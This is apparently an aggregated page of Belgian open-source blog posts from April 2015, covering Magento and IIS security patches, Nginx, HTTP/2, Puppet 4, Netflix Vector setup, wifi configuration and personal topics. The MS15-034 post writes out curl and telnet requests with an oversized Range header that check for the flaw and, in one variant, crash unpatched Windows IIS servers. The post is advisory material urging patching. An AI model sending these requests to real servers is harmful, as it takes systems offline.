Planet Grep is open to all people who either have the Belgian nationality or live in Belgium, and who actively work with or contribute to Open Source/Free software.

About Planet Grep...

Other planets can be found at the Planet Index.

A complete feed is available in a number of syndication formats: RSS 1.0, RSS 2.0, FOAF, and OPML.

The layout of this site was done by Gregory

April 21, 2015

Dieter Adriaenssens

Gorges du Tarn 2015

It was an amazing week, climbing in Gorges du Tarn with Bleau Climbing team during the second week of the Easter holiday.
Beautiful weather, nice people, good atmosphere, a lot of climbing, some personal bests and climbing improvements on both a physical and mental level.

Some impressions :

Great trip, looking forward to the next one!

by Dieter Adriaenssens ( at April 21, 2015 01:03 PM

Mattias Geniar

Magento eCommerce PHP Remote Code Execution

The post Magento eCommerce PHP Remote Code Execution appeared first on

The fun just never ends. A remote code execution exploit was found on February 9th, 2015.

Checkpoint released a blogpost yesterday with more details on that particular vulnerability.

Check Point researchers recently discovered a critical RCE (remote code execution) vulnerability in the Magento web e-commerce platform that can lead to the complete compromise of any Magento-based store, including credit card information as well as other financial and personal data, affecting nearly two hundred thousand online shops.
Analyzing the Magento Vulnerability

The patch to the Remote Code Execution vulnerability is available on the Magento site; Magento Downloads, patch SUPEE-5344.


Magento's Open Source Community Policy

One very annoying part of the Open Source edition of Magento, is that the downloads available on the site do not contain the patches yet. You have to download the latest release,, and still download and apply every patch available.

It's very common for users to just download the latest release thinking that should be the up-to-date one, patches included. It boggles my mind why Magento would willingly distribute unsafe code this way, assuming users would just find out to download the patches separately.

Added to that is the fact that version numbers don't increase with the patches being applied. Seriously, it's 2015 Magento, get your act together. This is a very lame tactic to force your users to consider the commercially supported version.

The patch

If you're wondering if you should apply the patch to your Magento installation or note, let me answer this with a very clear yes:

The vulnerability is actually comprised of a chain of several vulnerabilities that ultimately allow an unauthenticated attacker to execute PHP code on the web server.

Since the patch is behind a very annoying login-wall, I've mirrored it here:

The patch contains a bunch of whitespace, but the actual fix is this;

--- app/code/core/Mage/Admin/Model/Observer.php
+++ app/code/core/Mage/Admin/Model/Observer.php
@@ -43,6 +43,10 @@ class Mage_Admin_Model_Observer
         $session = Mage::getSingleton('admin/session');
         /** @var $session Mage_Admin_Model_Session */
+        /**
+         * @var $request Mage_Core_Controller_Request_Http
+         */
         $request = Mage::app()->getRequest();
         $user = $session->getUser();
@@ -56,7 +60,7 @@ class Mage_Admin_Model_Observer
         if (in_array($requestedActionName, $openActions)) {
         } else {
-            if($user) {
+            if ($user) {
             if (!$user || !$user->getId()) {
@@ -67,13 +71,14 @@ class Mage_Admin_Model_Observer
                     $user = $session->login($username, $password, $request);
                     $request->setPost('login', null);
-                if (!$request->getParam('forwarded')) {
+                if (!$request->getInternallyForwarded()) {
+                    $request->setInternallyForwarded();
                     if ($request->getParam('isIframe')) {
                         $request->setParam('forwarded', true)
-                    } elseif($request->getParam('isAjax')) {
+                    } elseif ($request->getParam('isAjax')) {
                         $request->setParam('forwarded', true)
diff --git app/code/core/Mage/Core/Controller/Request/Http.php app/code/core/Mage/Core/Controller/Request/Http.php
index 368f392..123e89e 100644
--- app/code/core/Mage/Core/Controller/Request/Http.php
+++ app/code/core/Mage/Core/Controller/Request/Http.php
@@ -76,6 +76,13 @@ class Mage_Core_Controller_Request_Http extends Zend_Controller_Request_Http
     protected $_beforeForwardInfo = array();
+     * Flag for recognizing if request internally forwarded
+     *
+     * @var bool
+     */
+    protected $_internallyForwarded = false;
+    /**
      * Returns ORIGINAL_PATH_INFO.
      * This value is calculated instead of reading PATH_INFO
      * directly from $_SERVER due to cross-platform differences.
@@ -530,4 +537,27 @@ class Mage_Core_Controller_Request_Http extends Zend_Controller_Request_Http
         return false;
+    /**
+     * Define that request was forwarded internally
+     *
+     * @param boolean $flag
+     * @return Mage_Core_Controller_Request_Http
+     */
+    public function setInternallyForwarded($flag = true)
+    {
+        $this->_internallyForwarded = (bool)$flag;
+        return $this;
+    }
+    /**
+     * Checks if request was forwarded internally
+     *
+     * @return bool
+     */
+    public function getInternallyForwarded()
+    {
+        return $this->_internallyForwarded;
+    }
diff --git lib/Varien/Db/Adapter/Pdo/Mysql.php lib/Varien/Db/Adapter/Pdo/Mysql.php
index 7b903df..a688695 100644
--- lib/Varien/Db/Adapter/Pdo/Mysql.php
+++ lib/Varien/Db/Adapter/Pdo/Mysql.php
@@ -2651,10 +2651,6 @@ class Varien_Db_Adapter_Pdo_Mysql extends Zend_Db_Adapter_Pdo_Mysql implements V
         $query = '';
         if (is_array($condition)) {
-            if (isset($condition['field_expr'])) {
-                $fieldName = str_replace('#?', $this->quoteIdentifier($fieldName), $condition['field_expr']);
-                unset($condition['field_expr']);
-            }
             $key = key(array_intersect_key($condition, $conditionKeyMap));
             if (isset($condition['from']) || isset($condition['to'])) {

Please patch!

The post Magento eCommerce PHP Remote Code Execution appeared first on

by Mattias Geniar at April 21, 2015 09:33 AM

April 20, 2015

Mattias Geniar

Nginx Open Sources TCP Load Balancing

The post Nginx Open Sources TCP Load Balancing appeared first on

A move we can only applaud.

Stream: port from NGINX+.

diffstat 20 files changed, 6079 insertions(+), 2 deletions(-) [+]
Changeset commit: changeset 6115:61d7ae76647d

A cryptic commit message for anyone that doesn't follow Nginx. But here's what it means: the TCP load balancing present in Nginx+ is now available in Nginx Open Source.

This kind of load balancing was reserved for paying Nginx+ customers, until now.

TCP Load Balancing

NGINX Plus terminates TCP connections, makes a load-balancing decision and then establishes a connection to the upstream server, relaying data between the client and server on demand. NGINX Plus delivers high availability using inline and synthetic health checks, slow-start for recovered servers, concurrency control, and the ability to designate servers as active, backup, or down.

Nginx+ Load Balancing

TCP Load Balancing would allow for setups to remove HAProxy or an alternative TCP load balancer and use Nginx for all of it. Previously, Nginx would do HTTP, POP3 and IMAP load balancing, but always within the protocol. Now, it will support native TCP connections as well.

More info on the TCP load balancing in Nginx+ can be found on the announcement of Nginx R6: Announcing NGINX Plus Release 6 with Enhanced Load Balancing.

A great move to make this Open Source, can't wait to see this made available in their RPM and DEB packages.

Would I be too optimistic in hoping that the Nginx+ Application Health Checks would also be ported into Nginx Open Source? Because that would be awesome and would eliminate Varnish as a advanced health-check proxy for backends in some of my configs.

The post Nginx Open Sources TCP Load Balancing appeared first on

by Mattias Geniar at April 20, 2015 04:22 PM

April 19, 2015

Wouter Verhelst

Youn Sun Nah 5tet: Light For The People

About a decade ago, I played in the (now defunct) "Jozef Pauly ensemble", a flute choir connected to the musical academy where I was taught to play the flute. At the time, this ensemble had the habit of goin on summer trips every year; sometimes these trips were large international concert tours (like our 2001 trip to Australia), but that wasn't always the case; there have also been smaller trips, like the 2002 one to the French Ardennes.

While there, we went on a day trip to the city of Reims. As a city close to the front in the first world war, it has a museum dedicated to that subject that I remembered going to. But the fondest memory of that day was going to a park where a podium was set up, with a few stacks of fold-up chairs standing nearby. I took one and listened to the music.

That was the day when I realized that I kindof like jazz. I had come into contact with Jazz before, but it had always been something to be used as a kind of musical wallpaper; something you put on, but don't consciously listen to. Watching this woman sing, however, was a different kind of experience altogether. I'm still very fond of her rendition of "Besame Mucho".

After having listened to the concert for about two hours, they called it quits, but did tell us that there was a record which you could buy. Of course, after having enjoyed the afternoon so much, I couldn't imagine not buying it, so that happened.

Fast forward several years, in the move from my apartment above my then-office to my current apartment (just around the corner), the record got put into the wrong box, and when I unpacked things again it got lost; permanently, I thought. Since I also hadn't digitized it yet at the time, I haven't listened to it anymore in quite a while.

But that time came to an end today. The record which I thought I'd lost wasn't, it was just in a weird place, and while cleaning yesterday, I found it sitting among a bunch of old stuff that I was going to throw out. Putting on the record today made me realize again how good it really is, and I thought that I might want to see if she was still active, and if she might perhaps have made another album.

It was great to find out that not only had she made six more albums since the one I bought, she'd also become a lot more known in the Jazz world (which I must admit I don't really follow all that well), and won a number of awards.

At the time, Youn Sun Nah was just a (fairly) recent graduate from a particular Jazz school in Paris. Today, she appears to be so much more...

April 19, 2015 09:25 AM

April 17, 2015

Mattias Geniar

Double-clicking On The Web

The post Double-clicking On The Web appeared first on

Here's a usability feature for the web: disable double-clicks on links and form submits.

Before you think I'm a complete idiot, allow me to talk some sense into the idea.

The Double-click Outside The Web

Everywhere in the Operating System, whether it's Windows or Mac OSX, the default behaviour to navigate between directories is by double-clicking them. We're trained to double-click anything.

Want to open an application? Double-click the icon. Want to open an e-mail in your mail client? Double-click the subject. Double-clicks everywhere.

Except on the web. The web is a single-click place.

Double The Click, Twice The Fun

We know we should only single-click a link. We know we should only click a form submit once. But sometimes, we double-click. Not because we do so intentionally, but because our brains are just hardwired to double-click everything.

For techies like us, a double-click happens by accident. It's an automated double-click, one we don't really think about. One we didn't mean to do.

For lesser-techies, also know as the common man or woman, double-clicks happen all the time. The user doesn't have a technical background, so they don't know the web works with single-clicks. Or perhaps they do, and don't see the harm in double-clicking.

But default browser behaviour is to accept user input. However foolish it may be.

If you accidentally double-click a form submit, you submit it twice. It's that simple. - - [18/Apr/2015:00:37:06 +0400] "POST /index.php HTTP/1.1" 200 0 - - [18/Apr/2015:00:37:07 +0400] "POST /index.php HTTP/1.1" 200 0

If you double-click a link, it opens twice. - - [18/Apr/2015:00:37:06 +0400] "GET /index.php HTTP/1.1" 200 9105 - - [18/Apr/2015:00:37:07 +0400] "GET /index.php HTTP/1.1" 200 9104

The problem is sort of solved with fast servers. If the page loads fast enough, the next page may already be downloading/rendering, so the second click of that double-click is hitting some kind of void, the limbo in between the current and the next page.

For slower servers, that just take more time to generate a response, a double-click would still happen and re-submit or re-open a link.


I recently filed a feature request at our devs for a similar problem.

If you accidentally (and we've all done this) double-click a form submit, you submit it twice. That means whatever action was requested, is executed by the server twice.

The fix client-side is relatively simple, to disable the form submit button after the first submit was registered. There's a simple jquery snippet that can solve this for you.

        setTimeout(function() {
            $('input').attr('disabled', 'disabled');
            $('a').attr('disabled', 'disabled');
        }, 50);

Server-side, a fix could be to implement some kind of rate limiting or double-submit protection within a particular timeframe. Server-side, this is a much harder problem to solve.

It's 2015, why is this even a thing to consider?

Proposed Solution

I can not think of a single reason why something like a form submit should have to be executed twice as a result of a double-click.

For a slow responding server, it's reasonable for a user to hit the submit again after more than a few seconds have passed and no feedback has been given. Because of the lack of visual feedback that the request is still being processed, the expectation has been raised that the form submit did not work.

So the user submits again, thinking he must have made a mistake the first attempt. If the same form submit has been registered by the browser in less than 2 seconds, surely that must have been a mistake and would count as an accidental double-click?

Why should every web service implement a double-click protection, either client-side or server-side, and reinvent the wheel? Wouldn't this make for a great browser feature?

What if a double-click is blocked by default, and can be enabled again by setting a new attribute on the form?

<form action="/something.php" allowmultiplesubmits>

Setting the allowmultiplesubmits attribute causes the browser to allow multiple submits to the same form in the same page, and by default the browser has some kind of flood/repeat/double-click protection to prevent this.

Maybe I'm over thinking it and this isn't an issue. But anyone who's active on the web has, at one point, accidentally double-clicked. And I think we've got all the technology available to fix that, once and for all.

The post Double-clicking On The Web appeared first on

by Mattias Geniar at April 17, 2015 08:52 PM

Philip Van Hoof

De dierentuin: geboortebeperking versus slachten

Michel Vandenbosch versus Dirk Draulans: ben ooit zo’n 15 jaar vegetariër geweest om vandaag tevreden te zijn over dit goed voorbereid en mooi gebalanceerd debat. Mijn dank aan de redactie van Terzake.

Ik was het eens met beide heren. Daarom was dit een waardig filosofische discussie: geboortebeperking versus het aan de leeuwen voeden van overbodige dieren plus het nut en de zin van goed gerunde dierenparken. Dat nut is me duidelijk: educatie voor de dwaze mens (z’n kinders, in de hoop dat de opvolging minder dwaas zal zijn)

Hoewel ik het eens was met beide ben ik momenteel zelf meer voor het aan de leeuwen voeden van overbodige dieren dan dat ik voor geboortebeperking van wel of niet bedreigde diersoorten ben. Dat leek me, met groot respect voor Vandenbosch’s, Draulans’ standpunt te zijn. Ethisch snapte ik Vandenbosch ook: is het niet beter om aan geboortebeperking te doen teneinde het leed van een slachting te vermijden?

Ik kies voor het standpunt van Draulans omdat dit het meeste de echte wereld nabootst. Ik vind het ook zeer goed dat het dierenpark de slachting van de giraffe aan de kinderen toonde. Want dit is de werkelijkheid. Onze kinderen moeten de werkelijkheid zien. We moeten met ons verstand de werkelijkheid nabootsen. Geen eufemisme zoals het doden van een giraffe een euthanasie noemen. Laten we onze kinders opvoeden met de werkelijkheid.

by admin at April 17, 2015 07:40 PM

Frank Goossens

XKCD on Code Quality

I honestly didn't think you could even USE emoji in variable names. Or that there were so many different crying ones.

What’s that style guide?

by frank at April 17, 2015 05:01 AM

April 16, 2015

Mattias Geniar

HTTP/1 vs HTTP/2 Page Loading

The post HTTP/1 vs HTTP/2 Page Loading appeared first on

An interesting proof-of-contept:

Especially with simulated latency, HTTP/2 shows its true potential.

HTTP/1: 31s to load

Loading happens in clear concurrency blocks of 6 assets each.


30 seconds later


And done, after a whopping 31 seconds.

HTTP/2: 1.7s to load

Concurrency shows its power here. Assets are loaded over a single multiplexed TCP stream.


1.5 seconds later


These results are in line with my earlier testing on HTTP/2;

Despite all its hate HTTP/2 seems to be receiving, some benchmarks just don't lie.

The post HTTP/1 vs HTTP/2 Page Loading appeared first on

by Mattias Geniar at April 16, 2015 03:50 PM

Open Source Puppet 4 Released

The post Open Source Puppet 4 Released appeared first on

And it looks like a great release, too.

Thanks to your valuable feedback, we’ve completely rewritten the parser and evaluator, ironed out some kinks, and learned how these changes interacted with all of the Puppet manifests already out in the wild.

In short, the future parser is no longer in the realm of the future. It’s here, and available by default. Also, the enhanced Puppet language delivers more power and greater reliability with smarter, more compact, code that is more human readable than ever before.
Say Hello to Open Source Puppet 4!

I'm also glad to read that one of my "lessons learned in Puppet" horror stories of sudden major-version upgrades is being tackled with Puppet Collections.

Puppet Collections is the new way Puppet Labs will deliver Open Source Puppet to users. A Puppet Collection is a package repository whose contents we guarantee will work together — think of it like a Linux distribution, but for Puppet-related packages. This should provide a few significant improvements over our past layouts on package servers.

Each collection will be opt-in, so if you’re running ensure => latest, you’ll get the latest in the collection you’re using.
Puppet Collections

The versioning is a bit strange, but I'll be able to live with that.

Collections are numbered with integers. The first one is Puppet Collection 1 (PC1) the next will be 2, and so on. The numbers have no significance other than PC2 is newer than PC1, etc.

Nice work Puppet Labs, I'm happy to see Puppet 4 out and released!

The post Open Source Puppet 4 Released appeared first on

by Mattias Geniar at April 16, 2015 09:19 AM

Frank Goossens

Celebrating 300000 Autoptimize downloads with new release

300k-1, that isSo just now Autoptimize passed the 300000 downloads mark (6 months after reaching 200k), which feels huge to me. To celebrate I just pushed out version 1.9.3, which features -as becomes a minor release- small improvements and bugfixes. From the changelog;

So there you have your present, no go unwrap it! Have fun! :-)

by frank at April 16, 2015 08:37 AM

April 15, 2015

Damien Sandras

Be IP is hiring!

In case some readers of this blog would be interested in working with Open Source software and VoIP technologies, Be IP ( is hiring a developer. Please see for the job description. You can contact me directly.

by Damien Sandras at April 15, 2015 09:58 AM

Mattias Geniar

Remote Code Execution Via HTTP Request In IIS On Windows

The post Remote Code Execution Via HTTP Request In IIS On Windows appeared first on

Patching time.

A remote code execution vulnerability exists in the HTTP protocol stack (HTTP.sys) that is caused when HTTP.sys improperly parses specially crafted HTTP requests. An attacker who successfully exploited this vulnerability could execute arbitrary code in the context of the System account.

To exploit this vulnerability, an attacker would have to send a specially crafted HTTP request to the affected system. The update addresses the vulnerability by modifying how the Windows HTTP stack handles requests.

Details are withheld for now, so it's a race: patch your systems before the attackers can reverse engineer the Windows patch.

More details: MS15-034
This vulnerability has been assigned a CVE: CVE-2015-1635

Update: exploit code is emerging

The first snippets of exploit code for MS15-034 are starting to show up, to scan for the vulnerability of a system.

char request1[] = "GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-18446744073709551615\r\n\r\n";


Detecting If You're Vulnerable

This remote scan is using the Range-header to trigger a buffer overflow and detect if the system is vulnerable or not.

$ telnet 80
GET / HTTP/1.1
Host: stuff
Range: bytes=0-18446744073709551615

The following curl command would mimic the same request.

$ curl -v -H "Host: irrelevant" -H "Range: bytes=0-18446744073709551615"

You should get a response saying "HTTP Error 400. The request has an invalid header name.". Anything else as a response, and your system may still be vulnerable.

The HTTP 'Ping Of Death' Request

The vulnerability allows for a Denial of Service in the form of a blue screen. It's nearly the same request as the check command above, but the range is different: Range: bytes=20-18446744073709551615.

$ curl -v -H "Host: irrelevant" -H "Range: bytes=20-18446744073709551615"
$ curl -v -H "Host: irrelevant" -H "Range: bytes=20-18446744073709551615"

A vulnerable Windows machine would get the request, roll over and die.

The Range-attack looks similar to a Denial-of-Service (DoS) attack on Apache a few years back that caused 100% CPU usage (dutch (NL) blogpost with more details).

When sending such a request, it can trigger a blue screen on the Windows Server, effectively rendering it offline.

The CVE and Microsoft Bulleting mention Remote Code Execution possibilities as well. Since the exact details of the patch aren't clear yet, it's unknown how to trigger that particular part of the vulnerability.

The post Remote Code Execution Via HTTP Request In IIS On Windows appeared first on

by Mattias Geniar at April 15, 2015 06:55 AM

Frank Goossens

Music from Monsieur Garnier: Acid Mondays

I still have some old Gilles Petersons “WorldWide” and Laurent Garniers “It is what it is” shows on my computer and once in a while I still “discover” gems in them. Just now, while on the train, I was listening to “It is what it is” Saison Quatre, emmission 2 and heard “El Recorrido” from Acid Mondays. The tracks starts out with just a (very) fat groove, but gets really interesting as from 2:37.

YouTube Video
Watch this video on YouTube or on Easy Youtube.

Ain’t it funky now?

by frank at April 15, 2015 06:21 AM

April 14, 2015

Claudio Ramirez

Post-it: PROXIMUS_AUTO_FON and TelenetWifree (Belgium) from GNU/Linux (or Windows 7)


The Belgian ISPs Proximus and Telenet both provide access to a network of hotspots. A nice recent addition is the use of alternative ssids for “automatic” connections instead of a captive portal where you login through a webpage. Sadly, their support pages provide next to no information to make a safe connection to these hotspots.

Proximus is a terrible offender. According to their support page on a PC only Windows 8.1 is supported. Linux, OSX *and* Windows 8 (!) or 7 users are kindly encouraged to use the open wifi connection and login through the captive portal. Oh, and no certification information is given for Windows 8.1 either. That’s pretty silly, as they use EAP-TTLS. Here is the setup to connect from whatever OS you use (terminology from gnome-network-manager):

Security: WPA2 Enterprise
Authentication: Tunneled TLS (TTLS)
Anonymous identity:
Certificate: GlobalSign Root CA (in Debian/Ubuntu in /usr/share/ca-certificates/mozilla/)
Inner Authentication: MSCHAPv2
Password: your_password_here

Telenet’s support page is slightly better (not a fake Windows 8.1 restriction), but pretty useless as well with no certificate information whatsoever. Here is the information needed to use TelenetWifree using PEAP:

SSID: TelenetWifree
Security: WPA2 Enterprise
Authentication: Protected EAP (PEAP)
Certificate: GlobalSign Root CA (in Debian/Ubuntu in /usr/share/ca-certificates/mozilla/)
Inner Authentication: MSCHAPv2
Password: your_password_here
Radius server certificate (optional):

If you’re interested, screenshots of the relevant parts of the wireshark traceare attached here:

proximus_rootca telenet_rootca

Filed under: Uncategorized Tagged: GNU/Linux, Lazy support, proximus, PROXIMUS_AUTO_PHONE, telenet, TelenetWifree, Windows 7

by claudio at April 14, 2015 08:51 PM

Mattias Geniar

Taking Netflix’s Vector (Performance Monitoring Tool) For A Spin

The post Taking Netflix’s Vector (Performance Monitoring Tool) For A Spin appeared first on

Yet another fine piece of open source software coming from Netflix (like CPU Flame Graphs).

Vector is an open source host-level performance monitoring framework, which exposes hand-picked, high-resolution system and application metrics to every engineer’s browser.


Previously, we'd login to instances as needed, run a variety of commands, and sift through the output for the metrics that matter. Vector cuts down the time to get to those metrics, helping us respond to incidents more quickly.
Netflix Techblog

Let's take it for a spin!

Running the web frontend

A few caveats before you can run it: Vector requires Bower to install dependencies and optionally Gulp for running the tasks; 2 tools mostly found on developer machines, not on the server. However, if you package it in your own RPM/DEB, that shouldn't be an issue anymore.

To avoid the installation on the server, you would run Vector on your local machine, and have it remotely connect to a PCP endpoint. More on that later.

If you're running on a Fedora based system (Fedora, Red Hat, CentOS, ...), use the following commands.

$ yum install nodejs npm
$ npm install -g bower
$ npm install -g gulp

If you're running it on your Mac OSX, make sure you have Brew (a package manager) installed and run the following commands.

$ brew install npm
$ npm install -g bower
$ npm install -g gulp

Now that you've got the preparations all done, download & run the Vector tool.

$ git clone
$ cd vector/
$ bower install
$ cd app/
$ python -m SimpleHTTPServer 8080

The last command starts a simple Python HTTP server on port 8080. Browse to http://localhost:8080/ to start the app.

Running Performance Co-Pilot (PCP)

Vector uses the PCP framework for collecting host metrics, so that service needs to be running.

$ yum install pcp pcp-webapi
$ service pcp start
$ service pmwebd start

Afterwards, the Vector tool will connect directly to the pcp-webapi port (:44323), so make sure it's firewalled! There's no authentication needed by default (but it's available, if you want it).

$ netstat -anp | grep ':44323'
tcp        0      0*   LISTEN      8970/pmwebd
tcp        0      0 :::44323          :::*        LISTEN      8970/pmwebd

In this regard, running Vector with PCP is similar to running Kibana, a client-side frontend that connects directly to an Elasticsearch instance.

This modus operandi of having a client-side interface to a remote endpoint is ideal for running the Vector tool locally (on your laptop, mac, ...), and having it connect to a remote PCP endpoint, that's running on each of your hosts.

No need to run the WebUI on any server!

A downside of running PCP on RHEL/CentOS systems: the PCP version currently supplied in EPEL repo's is 3.9.4. The version you need is ... 3.10. So bummer.

That leaves you with 2 options: try the RPM packages supplied by PCP themselves or compile from source. If you're going to compile from source, have a look at the RPM build steps in the PCP Vagrantfile, it has step-by-step instructions on compiling PCP from source and creating RPM/DEB files via ./Makepkgs.

It also requires a truckload of devel-dependencies, if you're compiling from source. These should be the full steps.

$ git clone
$ cd pcp
$ yum -y groupinstall 'Development Tools'
$ yum -y install git ncurses-devel readline-devel man libmicrohttpd-devel qt4-devel\
  python26 python26-devel perl-JSON sysstat perl-TimeDate \
  perl-XML-TokeParser perl-ExtUtils-MakeMaker perl-Time-HiRes \
  systemd-devel bc cairo-devel cyrus-sasl-devel \
  systemd-devel libibumad-devel libibmad-devel papi-devel libpfm-devel \
  rpm-devel perl-Spreadsheet-WriteExcel perl-Text-CSV_XS bind-utils httpd \
  python-devel nspr-devel nss-devel python-ctypes nss-tools \
  perl-Spreadsheet-XLSX ed cpan valgrind time xdpyinfo rrdtool-perl
$ env PYTHON=python2.6 ./Makepkgs
$ rpm -ivh  pcp-*/build/rpm/*.rpm
Preparing...                ########################################### [100%]
   1:pcp-conf               ########################################### [  4%]
   2:pcp-libs               ########################################### [  9%]
   3:perl-PCP-PMDA          ########################################### [ 13%]
   4:python-pcp             ########################################### [ 17%]
   5:pcp                    ########################################### [ 22%]
Rebuilding PMNS ...
Starting pmcd ...
Starting pmlogger ...
Starting pmie ...
Starting pmproxy ...
   6:perl-PCP-LogImport     ########################################### [ 26%]
   7:pcp-libs-devel         ########################################### [ 30%]
   8:pcp-testsuite          ########################################### [ 35%]
   9:pcp-import-ganglia2pcp ########################################### [ 39%]
  10:pcp-import-iostat2pcp  ########################################### [ 43%]
  11:pcp-import-mrtg2pcp    ########################################### [ 48%]
  12:pcp-import-sar2pcp     ########################################### [ 52%]
  13:pcp-import-sheet2pcp   ########################################### [ 57%]
  14:pcp-gui                ########################################### [ 61%]
  15:pcp-manager            ########################################### [ 65%]
Starting pmmgr ...
  16:pcp-pmda-infiniband    ########################################### [ 70%]
  17:pcp-pmda-papi          ########################################### [ 74%]
  18:perl-PCP-LogSummary    ########################################### [ 78%]
  19:perl-PCP-MMV           ########################################### [ 83%]
  20:pcp-import-collectl2pcp########################################### [ 87%]
  21:pcp-webapi             ########################################### [ 91%]
Starting pmwebd ...
  22:pcp-doc                ########################################### [ 96%]
  23:pcp-debuginfo          ########################################### [100%]
  24:pcp                    ########################################### [104%]

Once you've got the latest version of PCP running, the PCP web API will work.

$ service pmcd restart
$ service pmwebd restart

What's really cool is the short interval you have for gathering statistics. Similar to statsd, but without having to determine your own keys and items first.

What it looks like

Here's the default Dashboard as soon as you load the webapp. Click on each screenshot for a bigger version.




The current version of Vector has graphs for 4 major areas of the OS: Network, Disk, Memory & CPU.









Next steps

Their blogpost announcement hints to a few interesting "next steps" for the project. I particularly like the idea of having CPU Flame Graphs in an easily accessible UI!

The overhead of running PCP seems minimal, this may just be an additional tool for our managed hosting clients. More fine grained access to monitoring stats in a good looking WebUI for ad-hoc debugging. Sounds good to me!

Vector is definitely a tool to keep an eye on. You can follow the development process on Github;

The post Taking Netflix’s Vector (Performance Monitoring Tool) For A Spin appeared first on

by Mattias Geniar at April 14, 2015 06:47 PM

Nginx HTTP/2 Support Coming Late 2015

The post Nginx HTTP/2 Support Coming Late 2015 appeared first on

As anticipated.

We’re pleased to announce that we plan to release versions of NGINX Open Source and NGINX Plus by the end of 2015 that will include support for HTTP/2. blog

Now you've got a clear milestone for your HTTP/2 support on your website(s).

The post Nginx HTTP/2 Support Coming Late 2015 appeared first on

by Mattias Geniar at April 14, 2015 06:14 PM

Nginx Getting JavaScript Scripting Engine

The post Nginx Getting JavaScript Scripting Engine appeared first on

I missed the original hint in October 2014, so this came as a surprise to me.

Also, eventually, JavaScript can be used as [an] application language for Nginx. Currently we have only Perl and Lua [supported in Nginx]. Perl is our own model, and Lua is a third-party model.


We're planning JavaScript configurations, using JavaScript in [an] Nginx configuration. We plan to be more efficient on these [configurations], and we plan to develop a flexible application platform. You can use JavaScript snippets inside configurations to allow more flexible handling of requests, to filter responses, to modify responses. Also,

It seems Nginx is evolving into a bigger & bigger beast. I'm not yet sure what to think of JavaScript as a scripting language next to LUA in Nginx. At first sight, it looks like overkill. Like it's turning Nginx from the lean mean HTTP serving machine into a more bloated application server.

At the same time, it always struck me as odd that Nginx had a POP3 and IMAP proxy.

Maybe I'm just missing the vast amount of users that use Nginx as a TCP load balancers instead of just an HTTP webserver?

The post Nginx Getting JavaScript Scripting Engine appeared first on

by Mattias Geniar at April 14, 2015 06:11 PM

Frederic Hornain

[Fedora 21 Docker Base Image] Download



Fedora 21 Official Docker Base Images can be found at the following URL :

You can easily load this Docker image into your running Docker daemon using command:
docker load -i Fedora-Docker-Base-20141203-21.x86_64.tar.gz

Kind Regards


by Frederic Hornain at April 14, 2015 04:51 PM

Mattias Geniar

Varnish Cache 3.0 Is End Of Life

The post Varnish Cache 3.0 Is End Of Life appeared first on

A year after the release of Varnish 4, version 3.0 has been declared end-of-life.

A year has passed since the release of Varnish Cache 4.0.0.

According to our normal release schedule for Varnish Cache, this means
that the previous stable version will stop receiving regular

As of April 10th 2015, Varnish Cache 3.0 reached end of life (EOL) status.

Please use this opportunity to upgrade to Varnish Cache 4.0.

For paying Varnish Plus customers we'll support Varnish Cache 3.0 and
Varnish Cache Plus 3.0 for at least another year. Please contact me
directly if you have any questions in this regard.
varnish-announce mailing list

Seems fast. I must have missed the warning signals that Varnish 3.0 would be reaching end of life.

If you're looking at upgrading to Varnish 4, here are a few useful links;

Either way, time to take the upgrade to Varnish 4.0 serious.

The post Varnish Cache 3.0 Is End Of Life appeared first on

by Mattias Geniar at April 14, 2015 11:18 AM

Frederic Hornain

[Devoxx France 2015] Optaplanner Session



Here is the presentation “OptaPlanner ou comment optimiser les itinéraires, les plannings et bien plus encore…” Geoffrey and I did at Devoxx France on the Friday April 10 2015.

BTW, slides are in French


Optaplanner presentation @ Devoxx

N.B. : Only Chrome, Safari, Firefox, Opera and IE10-11 are supported

What is OptaPlanner?

OptaPlanner is a constraint satisfaction solver. It optimizes business resource planning. Every organization faces scheduling puzzles: assign a limited set of constrained resources (employees, assets, time and money) to provide products or services to customers. OptaPlanner optimizes such planning problems to do more business with less resources. Use cases include Vehicle Routing, Employee Rostering, Job Scheduling, Bin Packing and many more.

More inforation at

Optaplanner and CDI guys


Kind Regards



by Frederic Hornain at April 14, 2015 07:57 AM

April 13, 2015

Mattias Geniar

Linux Kernel 4.0

The post Linux Kernel 4.0 appeared first on

It's alive!

With one simple commit, the Release Candidate flag is removed and the 4.0 kernel is officially released. Unfortunately, there isn't much spectacle in this release.

Feature-wise, 4.0 doesn't have all that much special. Much have been
made of the new kernel patching infrastructure, but realistically,
that not only wasn't the reason for the version number change, we've
had much bigger changes in other versions. So this is very much a
"solid code progress" release.
Linus "we're all sheep" Torvalds

One interesting part is the decision to name this a 4.0 release. Then again, if you remember PHP6, version numbers really are just numbers, nothing special.

There is also a hint to a bigger release in 4.1 in the announcement.

[...] But we've definitely had bigger releases (and
judging by linux-next v4.1 is going to be one of the bigger ones).
Linus "we're all sheep" Torvalds

Give us a few years, and we'll be rocking the 4.0+ kernel in a modern Linux Distro. ;-)

The post Linux Kernel 4.0 appeared first on

by Mattias Geniar at April 13, 2015 04:32 PM

Dries Buytaert

Skiing in France

While I love photography, I never really got into video. Because I'm not the guy to pull off flips on skis or jump out of planes, I never considered myself the target audience for a GoPro. However, I got a GoPro for Christmas and was eager to try it on a ski trip to the French Alps. Below is my first attempt at shooting and editing video. The French Alps are stunning and that alone is reason to watch the video. No doubt I have to hone my skills -- both shooting and in the editing room -- and it wouldn't hurt if I could pull off a flip on my skis either. ;-)

by Dries at April 13, 2015 12:02 PM

April 12, 2015

Mattias Geniar

When The New TLD .SUCKS

The post When The New TLD .SUCKS appeared first on

I've never been a fan of the new TLD's. They won't all .SUCK, but this is just criminal.

Consider that a "Sunrise Claim" (an early registration in a new TLD by holders of registered trademarks) typically run a few hundred dollars, under .SUCKS they start at $2,499. It gets worse – if your mark happens to be one the registry has designated as a "premium" name, the Sunrise price will be even higher. (Oh, they also renew at those prices).
EasyDNS blog

Nobody wants their domain.SUCKS. The only reason to buy a .SUCKS domains, it to prevent others from having it. And at 2.5k just to claim your name and have a yearly renewal at the same fee, that's just criminal.

It's like paying the mafia to keep your grocery store from being mugged. Except the internet doesn't work this way. There's plenty of alternatives to create a domain name with a negative name connotation. Buying your own .SUCKS domain does nothing to help you with this.

If someone's willing to register a "", he's now got more than a 1000 alternative TLDs thanks to ICANN.

There's a reason most of the new TLDs don't catch on. They were never needed in the first place.

The post When The New TLD .SUCKS appeared first on

by Mattias Geniar at April 12, 2015 07:11 PM

Wouter Verhelst

LOADays 2015 talk done

